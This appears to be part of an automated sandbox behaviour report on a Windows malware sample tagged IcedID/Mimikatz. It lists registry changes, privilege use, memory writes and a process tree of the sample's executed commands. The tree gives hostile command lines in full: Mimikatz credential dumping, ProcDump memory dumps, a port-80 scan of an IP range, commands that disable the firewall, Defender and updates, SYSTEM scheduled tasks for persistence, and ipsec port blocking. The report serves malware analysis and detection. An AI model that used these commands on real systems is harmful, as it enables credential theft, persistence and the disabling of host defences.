Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wtumnnmbn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wtumnnmbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wtumnnmbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wtumnnmbn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wtumnnmbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wtumnnmbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	vbtnwbn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wtumnnmbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wtumnnmbn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wtumnnmbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wtumnnmbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	vbtnwbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wtumnnmbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wtumnnmbn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	vbtnwbn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wtumnnmbn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wtumnnmbn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wtumnnmbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wtumnnmbn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wtumnnmbn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	wtumnnmbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	vbtnwbn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wtumnnmbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wtumnnmbn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	vbtnwbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	vbtnwbn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wtumnnmbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wtumnnmbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wtumnnmbn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wtumnnmbn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wtumnnmbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wtumnnmbn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wtumnnmbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wtumnnmbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wtumnnmbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wtumnnmbn.exe

Modifies registry class 14 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	vbtnwbn.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3592	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
3924	2024-05-30_1b9c6c103616d1d2995ee12e8e02370c_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

description	pid	Process
Token: SeDebugPrivilege	3924	2024-05-30_1b9c6c103616d1d2995ee12e8e02370c_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	2300	vbtnwbn.exe
Token: SeDebugPrivilege	2564	vbtnwbn.exe
Token: SeDebugPrivilege	3240	vfshost.exe
Token: SeDebugPrivilege	4452	wtumnnmbn.exe
Token: SeLockMemoryPrivilege	2588	ngefld.exe
Token: SeLockMemoryPrivilege	2588	ngefld.exe
Token: SeDebugPrivilege	1804	wtumnnmbn.exe
Token: SeDebugPrivilege	1696	wtumnnmbn.exe
Token: SeDebugPrivilege	4760	wtumnnmbn.exe
Token: SeDebugPrivilege	4980	wtumnnmbn.exe
Token: SeDebugPrivilege	4564	wtumnnmbn.exe
Token: SeDebugPrivilege	1592	wtumnnmbn.exe
Token: SeDebugPrivilege	2196	wtumnnmbn.exe
Token: SeDebugPrivilege	348	wtumnnmbn.exe
Token: SeDebugPrivilege	2264	wtumnnmbn.exe
Token: SeDebugPrivilege	4472	wtumnnmbn.exe
Token: SeDebugPrivilege	3456	wtumnnmbn.exe
Token: SeDebugPrivilege	1748	wtumnnmbn.exe
Token: SeDebugPrivilege	2444	wtumnnmbn.exe
Token: SeDebugPrivilege	3208	wtumnnmbn.exe
Token: SeDebugPrivilege	3020	wtumnnmbn.exe
Token: SeDebugPrivilege	5016	wtumnnmbn.exe
Token: SeDebugPrivilege	2284	wtumnnmbn.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
3924	2024-05-30_1b9c6c103616d1d2995ee12e8e02370c_hacktools_icedid_mimikatz.exe
3924	2024-05-30_1b9c6c103616d1d2995ee12e8e02370c_hacktools_icedid_mimikatz.exe
2300	vbtnwbn.exe
2300	vbtnwbn.exe
2564	vbtnwbn.exe
2564	vbtnwbn.exe
2984	xohudmc.exe
3448	ewmksq.exe
1840	vbtnwbn.exe
1840	vbtnwbn.exe
5620	vbtnwbn.exe
5620	vbtnwbn.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3924 wrote to memory of 4568	3924	2024-05-30_1b9c6c103616d1d2995ee12e8e02370c_hacktools_icedid_mimikatz.exe	83
PID 3924 wrote to memory of 4568	3924	2024-05-30_1b9c6c103616d1d2995ee12e8e02370c_hacktools_icedid_mimikatz.exe	83
PID 3924 wrote to memory of 4568	3924	2024-05-30_1b9c6c103616d1d2995ee12e8e02370c_hacktools_icedid_mimikatz.exe	83
PID 4568 wrote to memory of 3592	4568	cmd.exe	85
PID 4568 wrote to memory of 3592	4568	cmd.exe	85
PID 4568 wrote to memory of 3592	4568	cmd.exe	85
PID 4568 wrote to memory of 2300	4568	cmd.exe	97
PID 4568 wrote to memory of 2300	4568	cmd.exe	97
PID 4568 wrote to memory of 2300	4568	cmd.exe	97
PID 2564 wrote to memory of 1888	2564	vbtnwbn.exe	99
PID 2564 wrote to memory of 1888	2564	vbtnwbn.exe	99
PID 2564 wrote to memory of 1888	2564	vbtnwbn.exe	99
PID 1888 wrote to memory of 4952	1888	cmd.exe	101
PID 1888 wrote to memory of 4952	1888	cmd.exe	101
PID 1888 wrote to memory of 4952	1888	cmd.exe	101
PID 1888 wrote to memory of 1708	1888	cmd.exe	102
PID 1888 wrote to memory of 1708	1888	cmd.exe	102
PID 1888 wrote to memory of 1708	1888	cmd.exe	102
PID 1888 wrote to memory of 2492	1888	cmd.exe	103
PID 1888 wrote to memory of 2492	1888	cmd.exe	103
PID 1888 wrote to memory of 2492	1888	cmd.exe	103
PID 1888 wrote to memory of 4340	1888	cmd.exe	104
PID 1888 wrote to memory of 4340	1888	cmd.exe	104
PID 1888 wrote to memory of 4340	1888	cmd.exe	104
PID 1888 wrote to memory of 468	1888	cmd.exe	105
PID 1888 wrote to memory of 468	1888	cmd.exe	105
PID 1888 wrote to memory of 468	1888	cmd.exe	105
PID 1888 wrote to memory of 3860	1888	cmd.exe	106
PID 1888 wrote to memory of 3860	1888	cmd.exe	106
PID 1888 wrote to memory of 3860	1888	cmd.exe	106
PID 2564 wrote to memory of 4208	2564	vbtnwbn.exe	107
PID 2564 wrote to memory of 4208	2564	vbtnwbn.exe	107
PID 2564 wrote to memory of 4208	2564	vbtnwbn.exe	107
PID 2564 wrote to memory of 3680	2564	vbtnwbn.exe	109
PID 2564 wrote to memory of 3680	2564	vbtnwbn.exe	109
PID 2564 wrote to memory of 3680	2564	vbtnwbn.exe	109
PID 2564 wrote to memory of 5072	2564	vbtnwbn.exe	112
PID 2564 wrote to memory of 5072	2564	vbtnwbn.exe	112
PID 2564 wrote to memory of 5072	2564	vbtnwbn.exe	112
PID 2564 wrote to memory of 4076	2564	vbtnwbn.exe	116
PID 2564 wrote to memory of 4076	2564	vbtnwbn.exe	116
PID 2564 wrote to memory of 4076	2564	vbtnwbn.exe	116
PID 4076 wrote to memory of 1692	4076	cmd.exe	118
PID 4076 wrote to memory of 1692	4076	cmd.exe	118
PID 4076 wrote to memory of 1692	4076	cmd.exe	118
PID 1692 wrote to memory of 3032	1692	wpcap.exe	119
PID 1692 wrote to memory of 3032	1692	wpcap.exe	119
PID 1692 wrote to memory of 3032	1692	wpcap.exe	119
PID 3032 wrote to memory of 3404	3032	net.exe	121
PID 3032 wrote to memory of 3404	3032	net.exe	121
PID 3032 wrote to memory of 3404	3032	net.exe	121
PID 1692 wrote to memory of 4480	1692	wpcap.exe	122
PID 1692 wrote to memory of 4480	1692	wpcap.exe	122
PID 1692 wrote to memory of 4480	1692	wpcap.exe	122
PID 4480 wrote to memory of 3248	4480	net.exe	124
PID 4480 wrote to memory of 3248	4480	net.exe	124
PID 4480 wrote to memory of 3248	4480	net.exe	124
PID 1692 wrote to memory of 2540	1692	wpcap.exe	125
PID 1692 wrote to memory of 2540	1692	wpcap.exe	125
PID 1692 wrote to memory of 2540	1692	wpcap.exe	125
PID 2540 wrote to memory of 4528	2540	net.exe	127
PID 2540 wrote to memory of 4528	2540	net.exe	127
PID 2540 wrote to memory of 4528	2540	net.exe	127
PID 1692 wrote to memory of 2444	1692	wpcap.exe	128

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2136
- C:\Windows\TEMP\ybidsenfa\ngefld.exe
  "C:\Windows\TEMP\ybidsenfa\ngefld.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2588

C:\Users\Admin\AppData\Local\Temp\2024-05-30_1b9c6c103616d1d2995ee12e8e02370c_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-05-30_1b9c6c103616d1d2995ee12e8e02370c_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3924
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bwbylena\vbtnwbn.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4568
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - Runs ping.exe
    PID:3592
- - C:\Windows\bwbylena\vbtnwbn.exe
    C:\Windows\bwbylena\vbtnwbn.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2300

C:\Windows\bwbylena\vbtnwbn.exe
C:\Windows\bwbylena\vbtnwbn.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4952
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2492
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:4340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:468
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:3860
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  PID:4208
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  PID:3680
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  PID:5072
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\cysgelbgy\gtirgeyld\wpcap.exe /S
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4076
- - C:\Windows\cysgelbgy\gtirgeyld\wpcap.exe
    C:\Windows\cysgelbgy\gtirgeyld\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:1692
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3032
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        
        PID:3404
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4480
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        
        PID:3248
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2540
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        
        PID:4528
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      PID:2444
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        
        PID:3932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:2300
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:1324
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:4316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:4932
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:4796
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:116
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\cysgelbgy\gtirgeyld\gwbrtisnb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\cysgelbgy\gtirgeyld\Scant.txt
  2⤵
  PID:2688
- - C:\Windows\cysgelbgy\gtirgeyld\gwbrtisnb.exe
    C:\Windows\cysgelbgy\gtirgeyld\gwbrtisnb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\cysgelbgy\gtirgeyld\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2772
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\cysgelbgy\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\cysgelbgy\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  PID:1128
- - C:\Windows\cysgelbgy\Corporate\vfshost.exe
    C:\Windows\cysgelbgy\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fblwycvbn" /ru system /tr "cmd /c C:\Windows\ime\vbtnwbn.exe"
  2⤵
  PID:3456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1340
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "fblwycvbn" /ru system /tr "cmd /c C:\Windows\ime\vbtnwbn.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "cwtnaiyyg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bwbylena\vbtnwbn.exe /p everyone:F"
  2⤵
  PID:2704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4128
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "cwtnaiyyg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bwbylena\vbtnwbn.exe /p everyone:F"
    3⤵
    - Creates scheduled task(s)
    PID:4468
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "anmillmgb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ybidsenfa\ngefld.exe /p everyone:F"
  2⤵
  PID:1720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:740
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "anmillmgb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ybidsenfa\ngefld.exe /p everyone:F"
    3⤵
    - Creates scheduled task(s)
    PID:4384
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  PID:4416
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  PID:3136
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:1776
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:2036
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  PID:3768
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  PID:4640
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:3628
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:116
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  PID:4208
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  PID:1900
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:1804
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:1336
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  PID:4428
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    PID:4384
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      PID:2296
- C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe
  C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe -accepteula -mp 784 C:\Windows\TEMP\cysgelbgy\784.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4452
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  PID:3924
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    PID:4100
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  PID:2184
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:1108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  PID:2388
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    PID:3528
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      PID:2708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  PID:4292
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:4560
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:2368
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  PID:1924
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    PID:4340
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      PID:2300
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  PID:1328
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:3828
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  PID:4528
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:4216
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  PID:2800
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:1696
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  PID:4544
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    PID:1836
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  PID:2984
- C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe
  C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe -accepteula -mp 336 C:\Windows\TEMP\cysgelbgy\336.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1804
- C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe
  C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe -accepteula -mp 2136 C:\Windows\TEMP\cysgelbgy\2136.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1696
- C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe
  C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe -accepteula -mp 2648 C:\Windows\TEMP\cysgelbgy\2648.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4760
- C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe
  C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe -accepteula -mp 2784 C:\Windows\TEMP\cysgelbgy\2784.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4980
- C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe
  C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe -accepteula -mp 2808 C:\Windows\TEMP\cysgelbgy\2808.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4564
- C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe
